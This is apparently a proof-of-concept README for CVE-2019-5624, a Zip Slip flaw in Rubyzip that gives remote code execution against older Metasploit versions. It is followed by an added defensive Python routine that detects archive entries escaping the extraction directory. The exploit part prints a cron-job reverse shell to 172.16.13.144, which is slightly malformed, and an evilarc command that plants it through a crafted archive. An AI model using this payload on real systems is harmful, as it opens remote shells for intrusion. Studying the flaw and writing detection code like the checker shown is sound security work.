A proof of concept for Metasploit's CVE-2019-5624 vulnerability (Rubyzip insecure ZIP handling RCE)
In February 2019 I found a new vulnerability in the Rubyzip library. It allows an attacker to exploit insecure ZIP handling (Zip Slip), resulting in remote command execution.
This vulnerability was leveraged to target all Metasploit versions < 5.0.18 (see the Metasploit Wrap-Up).
I've written a detailed blog post explaining the vulnerability.
```
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
```

```
python evilarc.py exploit --os unix -p etc/cron.d/
```
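As an added example that is not part of this PoC, here is the check a Zip Slip-safe extractor must make before writing anything: each entry name is resolved against the extraction directory and flagged if it is absolute or its `..` components climb out of that directory. The archive it inspects is constructed in memory with placeholder contents, and `/srv/unpack` is an assumed destination.

```python
import io
import os
import zipfile


def is_unsafe_entry(name, dest_dir):
    """True if extracting `name` under `dest_dir` would write outside it.

    Rubyzip's vulnerable versions skipped exactly this step, so an entry
    named like "../../etc/cron.d/x" landed in /etc/cron.d instead of the
    destination. Absolute names are rejected outright because joining
    them onto the destination would discard the destination entirely.
    """
    if os.path.isabs(name) or name.startswith("\\"):
        return True
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, name))
    # commonpath collapses to "/" (or a parent) when the target escaped.
    return os.path.commonpath([dest, target]) != dest


def zip_slip_entries(archive_bytes, dest_dir="/srv/unpack"):
    """Return the names of all entries that would escape dest_dir."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return [n for n in zf.namelist() if is_unsafe_entry(n, dest_dir)]


def build_sample_archive():
    """Constructed fixture: one benign entry and two that escape the
    destination. Contents are placeholders, not real cron jobs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", b"benign entry")
        zf.writestr("../../etc/cron.d/constructed", b"placeholder content")
        zf.writestr("/etc/constructed", b"absolute path entry")
    return buf.getvalue()


if __name__ == "__main__":
    for name in zip_slip_entries(build_sample_archive()):
        print("would escape destination:", name)
```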